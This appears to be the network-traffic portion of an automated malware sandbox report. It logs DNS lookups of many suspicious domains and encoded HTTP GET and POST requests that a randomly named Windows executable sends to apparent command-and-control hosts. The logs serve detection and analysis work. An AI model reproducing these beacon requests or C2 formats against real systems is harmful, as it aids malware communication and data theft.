Aug 31, 2024 14:07:03.974952936 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974961996 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.974966049 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.974984884 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.975008965 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.975020885 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.975030899 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.975047112 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.975162983 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:03.975783110 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.979759932 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.979796886 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:03.979805946 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.031049967 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066083908 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066101074 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066122055 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066133022 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066143036 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066143990 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066184998 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066435099 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066477060 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066484928 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066490889 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066526890 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066875935 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066886902 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066896915 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066920996 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.066983938 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.066997051 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067023039 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.067682981 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067723989 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067729950 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.067735910 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067764997 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.067866087 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067877054 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.067961931 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.068558931 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.068602085 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.068613052 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.068640947 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.068713903 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.068723917 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.068754911 CEST	58144	80	192.168.2.4	188.114.96.3
Aug 31, 2024 14:07:04.069413900 CEST	80	58144	188.114.96.3	192.168.2.4
Aug 31, 2024 14:07:04.069477081 CEST	58144	80	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 14:03:29.772362947 CEST	53	63987	162.159.36.2	192.168.2.4
Aug 31, 2024 14:03:30.232165098 CEST	55967	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:03:30.240614891 CEST	53	55967	1.1.1.1	192.168.2.4
Aug 31, 2024 14:03:50.317204952 CEST	64090	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:03:50.484178066 CEST	53	64090	1.1.1.1	192.168.2.4
Aug 31, 2024 14:04:06.033819914 CEST	51723	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:04:06.223622084 CEST	53	51723	1.1.1.1	192.168.2.4
Aug 31, 2024 14:04:19.377737999 CEST	58315	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:04:19.393306017 CEST	53	58315	1.1.1.1	192.168.2.4
Aug 31, 2024 14:04:32.568253994 CEST	57955	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:04:32.664814949 CEST	53	57955	1.1.1.1	192.168.2.4
Aug 31, 2024 14:04:46.003772974 CEST	57375	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:04:46.051410913 CEST	53	57375	1.1.1.1	192.168.2.4
Aug 31, 2024 14:04:59.174566031 CEST	50863	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:04:59.191993952 CEST	53	50863	1.1.1.1	192.168.2.4
Aug 31, 2024 14:05:07.253309011 CEST	59373	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:05:07.264904976 CEST	53	59373	1.1.1.1	192.168.2.4
Aug 31, 2024 14:05:20.850800037 CEST	63552	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:05:21.843394995 CEST	63552	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:05:22.074918985 CEST	53	63552	1.1.1.1	192.168.2.4
Aug 31, 2024 14:05:22.074942112 CEST	53	63552	1.1.1.1	192.168.2.4
Aug 31, 2024 14:05:35.474828005 CEST	57384	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:05:35.491302013 CEST	53	57384	1.1.1.1	192.168.2.4
Aug 31, 2024 14:05:48.644469023 CEST	59321	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:05:48.853836060 CEST	53	59321	1.1.1.1	192.168.2.4
Aug 31, 2024 14:06:01.988981962 CEST	62178	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:06:02.422481060 CEST	53	62178	1.1.1.1	192.168.2.4
Aug 31, 2024 14:06:16.128580093 CEST	50470	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:06:16.329933882 CEST	53	50470	1.1.1.1	192.168.2.4
Aug 31, 2024 14:06:30.301978111 CEST	59313	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:06:30.323676109 CEST	53	59313	1.1.1.1	192.168.2.4
Aug 31, 2024 14:06:43.629431963 CEST	55024	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:06:44.383513927 CEST	53	55024	1.1.1.1	192.168.2.4
Aug 31, 2024 14:06:57.722086906 CEST	51274	53	192.168.2.4	1.1.1.1
Aug 31, 2024 14:06:57.733935118 CEST	53	51274	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 31, 2024 14:03:30.232165098 CEST	192.168.2.4	1.1.1.1	0x98d8	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Aug 31, 2024 14:03:50.317204952 CEST	192.168.2.4	1.1.1.1	0x24e9	Standard query (0)	www.dom-2.online	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:06.033819914 CEST	192.168.2.4	1.1.1.1	0xf9b1	Standard query (0)	www.soliro.life	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:19.377737999 CEST	192.168.2.4	1.1.1.1	0x8720	Standard query (0)	www.playdoge.buzz	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:32.568253994 CEST	192.168.2.4	1.1.1.1	0xf22e	Standard query (0)	www.farukugurluakdogan.xyz	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:46.003772974 CEST	192.168.2.4	1.1.1.1	0xf7d7	Standard query (0)	www.pacoteagil.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:59.174566031 CEST	192.168.2.4	1.1.1.1	0x1a02	Standard query (0)	www.pelus-pijama-pro.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:07.253309011 CEST	192.168.2.4	1.1.1.1	0xab8a	Standard query (0)	www.23ddv.top	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:20.850800037 CEST	192.168.2.4	1.1.1.1	0xd6c7	Standard query (0)	www.pilibit.site	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:21.843394995 CEST	192.168.2.4	1.1.1.1	0xd6c7	Standard query (0)	www.pilibit.site	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:35.474828005 CEST	192.168.2.4	1.1.1.1	0x701	Standard query (0)	www.astrocloud.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:48.644469023 CEST	192.168.2.4	1.1.1.1	0xc3f9	Standard query (0)	www.rantup.com	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:01.988981962 CEST	192.168.2.4	1.1.1.1	0xe877	Standard query (0)	www.sssqqq07-22.fun	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:16.128580093 CEST	192.168.2.4	1.1.1.1	0x78e1	Standard query (0)	www.shipincheshi.skin	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:30.301978111 CEST	192.168.2.4	1.1.1.1	0x42f6	Standard query (0)	www.ablackwomansmarch.info	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:43.629431963 CEST	192.168.2.4	1.1.1.1	0x9287	Standard query (0)	www.kiristyle.shop	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:57.722086906 CEST	192.168.2.4	1.1.1.1	0xa352	Standard query (0)	www.x0x9x8x8x7x6.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 31, 2024 14:03:30.240614891 CEST	1.1.1.1	192.168.2.4	0x98d8	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Aug 31, 2024 14:03:50.484178066 CEST	1.1.1.1	192.168.2.4	0x24e9	No error (0)	www.dom-2.online		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:06.223622084 CEST	1.1.1.1	192.168.2.4	0xf9b1	No error (0)	www.soliro.life		3.33.244.179	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:19.393306017 CEST	1.1.1.1	192.168.2.4	0x8720	No error (0)	www.playdoge.buzz		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:19.393306017 CEST	1.1.1.1	192.168.2.4	0x8720	No error (0)	www.playdoge.buzz		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:32.664814949 CEST	1.1.1.1	192.168.2.4	0xf22e	No error (0)	www.farukugurluakdogan.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:04:32.664814949 CEST	1.1.1.1	192.168.2.4	0xf22e	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:04:32.664814949 CEST	1.1.1.1	192.168.2.4	0xf22e	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:46.051410913 CEST	1.1.1.1	192.168.2.4	0xf7d7	No error (0)	www.pacoteagil.shop	pacoteagil.shop		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:04:46.051410913 CEST	1.1.1.1	192.168.2.4	0xf7d7	No error (0)	pacoteagil.shop		84.32.84.32	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:04:59.191993952 CEST	1.1.1.1	192.168.2.4	0x1a02	Name error (3)	www.pelus-pijama-pro.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:07.264904976 CEST	1.1.1.1	192.168.2.4	0xab8a	No error (0)	www.23ddv.top	23ddv.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:05:07.264904976 CEST	1.1.1.1	192.168.2.4	0xab8a	No error (0)	23ddv.top		154.23.184.218	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:22.074918985 CEST	1.1.1.1	192.168.2.4	0xd6c7	No error (0)	www.pilibit.site	pilibit.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:05:22.074918985 CEST	1.1.1.1	192.168.2.4	0xd6c7	No error (0)	pilibit.site		200.58.111.42	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:22.074942112 CEST	1.1.1.1	192.168.2.4	0xd6c7	No error (0)	www.pilibit.site	pilibit.site		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:05:22.074942112 CEST	1.1.1.1	192.168.2.4	0xd6c7	No error (0)	pilibit.site		200.58.111.42	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:35.491302013 CEST	1.1.1.1	192.168.2.4	0x701	No error (0)	www.astrocloud.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:35.491302013 CEST	1.1.1.1	192.168.2.4	0x701	No error (0)	www.astrocloud.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:48.853836060 CEST	1.1.1.1	192.168.2.4	0xc3f9	No error (0)	www.rantup.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:05:48.853836060 CEST	1.1.1.1	192.168.2.4	0xc3f9	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:05:48.853836060 CEST	1.1.1.1	192.168.2.4	0xc3f9	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:05:48.853836060 CEST	1.1.1.1	192.168.2.4	0xc3f9	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:02.422481060 CEST	1.1.1.1	192.168.2.4	0xe877	No error (0)	www.sssqqq07-22.fun		45.113.201.77	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:16.329933882 CEST	1.1.1.1	192.168.2.4	0x78e1	No error (0)	www.shipincheshi.skin		154.23.176.197	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:16.329933882 CEST	1.1.1.1	192.168.2.4	0x78e1	No error (0)	www.shipincheshi.skin		154.23.176.232	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:30.323676109 CEST	1.1.1.1	192.168.2.4	0x42f6	No error (0)	www.ablackwomansmarch.info	ablackwomansmarch.info		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:06:30.323676109 CEST	1.1.1.1	192.168.2.4	0x42f6	No error (0)	ablackwomansmarch.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:30.323676109 CEST	1.1.1.1	192.168.2.4	0x42f6	No error (0)	ablackwomansmarch.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:44.383513927 CEST	1.1.1.1	192.168.2.4	0x9287	No error (0)	www.kiristyle.shop	shops.vipshopbuy.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 31, 2024 14:06:44.383513927 CEST	1.1.1.1	192.168.2.4	0x9287	No error (0)	shops.vipshopbuy.com		35.244.245.121	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:57.733935118 CEST	1.1.1.1	192.168.2.4	0xa352	No error (0)	www.x0x9x8x8x7x6.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 31, 2024 14:06:57.733935118 CEST	1.1.1.1	192.168.2.4	0xa352	No error (0)	www.x0x9x8x8x7x6.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dom-2.online

www.soliro.life

www.playdoge.buzz

www.farukugurluakdogan.xyz

www.pacoteagil.shop

www.23ddv.top

www.pilibit.site

www.astrocloud.shop

www.rantup.com

www.sssqqq07-22.fun

www.shipincheshi.skin

www.ablackwomansmarch.info

www.kiristyle.shop

www.x0x9x8x8x7x6.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	58093	199.59.243.226	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:03:50.506298065 CEST	421	OUT	GET /184n/?fVU8=HRzx&ZXzt1jdX=tTw8bcF9ynF7NxNhIHnuE7PiwszZpdssllgSy53HU9FeypU+H5DHpDJo8VdiQv3xpb0wKqaBA5vXWKI3ejJljZEG/7rnegNjrXxjwHY74ScRyh8HTmiatRM= HTTP/1.1 Host: www.dom-2.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:03:50.988245964 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 31 Aug 2024 12:03:50 GMT content-type: text/html; charset=utf-8 content-length: 1450 x-request-id: 18aa4239-cf7d-4d0a-b4d3-f2007d2d4792 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_v4s46x4syOKbYHQLsPa10lQrWelXoPt0k+uzUACB8lbMAV29VtNa1VumoWe/HKO8xB2cnR17UGTv2GafU2uyhw== set-cookie: parking_session=18aa4239-cf7d-4d0a-b4d3-f2007d2d4792; expires=Sat, 31 Aug 2024 12:18:50 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 34 73 34 36 78 34 73 79 4f 4b 62 59 48 51 4c 73 50 61 31 30 6c 51 72 57 65 6c 58 6f 50 74 30 6b 2b 75 7a 55 41 43 42 38 6c 62 4d 41 56 32 39 56 74 4e 61 31 56 75 6d 6f 57 65 2f 48 4b 4f 38 78 42 32 63 6e 52 31 37 55 47 54 76 32 47 61 66 55 32 75 79 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_v4s46x4syOKbYHQLsPa10lQrWelXoPt0k+uzUACB8lbMAV29VtNa1VumoWe/HKO8xB2cnR17UGTv2GafU2uyhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 31, 2024 14:03:50.988447905 CEST	903	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMThhYTQyMzktY2Y3ZC00ZDBhLWI0ZDMtZjIwMDdkMmQ0NzkyIiwicGFnZV90aW1lIjoxNzI1MTA1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	58094	3.33.244.179	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:06.245716095 CEST	688	OUT	POST /qkji/ HTTP/1.1 Host: www.soliro.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.soliro.life Referer: http://www.soliro.life/qkji/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 36 6a 6d 65 45 48 38 59 69 52 2f 36 77 59 64 45 4a 37 6a 78 48 4f 39 75 38 59 47 44 73 55 77 52 6e 46 7a 5a 4f 56 54 4e 4e 49 63 46 74 44 70 62 57 35 4c 62 72 33 56 37 45 62 71 6a 6b 70 74 4a 37 4d 75 49 39 70 36 6e 52 34 72 32 6e 4d 48 6b 4f 7a 51 6b 54 58 61 37 35 42 50 6d 70 63 6e 71 75 75 58 47 52 75 49 68 36 48 58 59 2b 42 4c 51 2f 42 31 6e 57 68 73 35 38 2b 36 45 37 6a 4c 78 34 57 48 77 6c 78 47 49 7a 38 39 32 33 71 73 4b 58 2f 53 7a 79 47 46 37 70 54 58 47 6f 56 72 4a 75 53 61 56 71 57 45 2b 63 79 6f 6b 35 62 66 79 68 45 52 57 77 6e 31 2f 72 61 38 73 57 63 71 39 30 41 3d 3d Data Ascii: ZXzt1jdX=6jmeEH8YiR/6wYdEJ7jxHO9u8YGDsUwRnFzZOVTNNIcFtDpbW5Lbr3V7EbqjkptJ7MuI9p6nR4r2nMHkOzQkTXa75BPmpcnquuXGRuIh6HXY+BLQ/B1nWhs58+6E7jLx4WHwlxGIz8923qsKX/SzyGF7pTXGoVrJuSaVqWE+cyok5bfyhERWwn1/ra8sWcq90A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	58095	3.33.244.179	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:08.812155962 CEST	708	OUT	POST /qkji/ HTTP/1.1 Host: www.soliro.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.soliro.life Referer: http://www.soliro.life/qkji/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 36 6a 6d 65 45 48 38 59 69 52 2f 36 77 35 4e 45 49 63 50 78 50 4f 39 76 32 34 47 44 33 45 78 61 6e 46 2f 5a 4f 51 79 49 4f 37 6f 46 74 6d 74 62 58 34 4c 62 75 33 56 37 4d 37 71 6d 67 70 74 43 37 4d 6a 39 39 6f 47 6e 52 34 76 32 6e 4a 37 6b 4f 41 49 6e 53 48 61 35 30 68 50 67 33 73 6e 71 75 75 58 47 52 75 74 70 36 48 2f 59 2b 52 37 51 2f 67 31 67 4e 42 73 36 32 65 36 45 2f 6a 4b 36 34 57 47 6c 6c 31 47 79 7a 36 68 32 33 72 63 4b 58 4f 53 77 34 47 46 35 74 54 58 51 67 6b 43 72 6a 6a 54 49 30 55 63 59 57 47 77 41 34 64 4f 6f 77 31 77 42 69 6e 52 4d 32 64 31 59 62 66 58 30 76 47 62 55 38 7a 55 44 78 7a 6a 52 64 66 4f 79 59 7a 4b 34 72 52 77 3d Data Ascii: ZXzt1jdX=6jmeEH8YiR/6w5NEIcPxPO9v24GD3ExanF/ZOQyIO7oFtmtbX4Lbu3V7M7qmgptC7Mj99oGnR4v2nJ7kOAInSHa50hPg3snquuXGRutp6H/Y+R7Q/g1gNBs62e6E/jK64WGll1Gyz6h23rcKXOSw4GF5tTXQgkCrjjTI0UcYWGwA4dOow1wBinRM2d1YbfX0vGbU8zUDxzjRdfOyYzK4rRw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	58096	3.33.244.179	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:04:11.369182110 CEST	10790	OUT	POST /qkji/ HTTP/1.1 Host: www.soliro.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.soliro.life Referer: http://www.soliro.life/qkji/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 36 6a 6d 65 45 48 38 59 69 52 2f 36 77 35 4e 45 49 63 50 78 50 4f 39 76 32 34 47 44 33 45 78 61 6e 46 2f 5a 4f 51 79 49 4f 37 77 46 74 51 52 62 57 62 7a 62 70 33 56 37 47 62 71 6e 67 70 74 6c 37 49 50 78 39 6f 4b 6f 52 36 6e 32 6d 76 50 6b 49 78 49 6e 62 48 61 35 39 42 50 68 70 63 6d 75 75 75 48 4b 52 75 64 70 36 48 2f 59 2b 53 6a 51 32 52 31 67 50 42 73 35 38 2b 37 46 37 6a 4b 53 34 56 32 31 6c 31 4b 59 79 4a 35 32 32 49 30 4b 56 63 36 77 69 47 46 2f 71 54 57 54 67 6b 65 64 6a 6e 37 45 30 56 6f 69 57 42 51 41 35 5a 44 43 30 58 67 37 7a 68 38 57 30 39 46 34 58 63 2f 70 6e 30 65 6f 7a 77 4e 59 6e 43 58 37 66 76 2f 37 66 51 61 47 79 68 52 4e 47 52 35 36 30 75 48 2f 6e 70 46 32 56 49 4c 30 6d 69 50 35 63 42 45 41 63 79 46 4f 4d 75 48 70 65 4a 33 4f 4f 53 42 50 6b 57 31 62 2f 48 75 6e 73 49 74 7a 50 62 44 39 49 46 76 49 6c 49 67 43 2f 4c 4a 4d 51 42 48 51 69 71 61 69 6f 45 50 54 74 30 42 59 45 58 70 6c 76 61 68 59 2f 36 4a 4c 56 30 67 57 61 35 4c 38 75 31 79 71 42 73 30 7a 78 [TRUNCATED] Data Ascii: 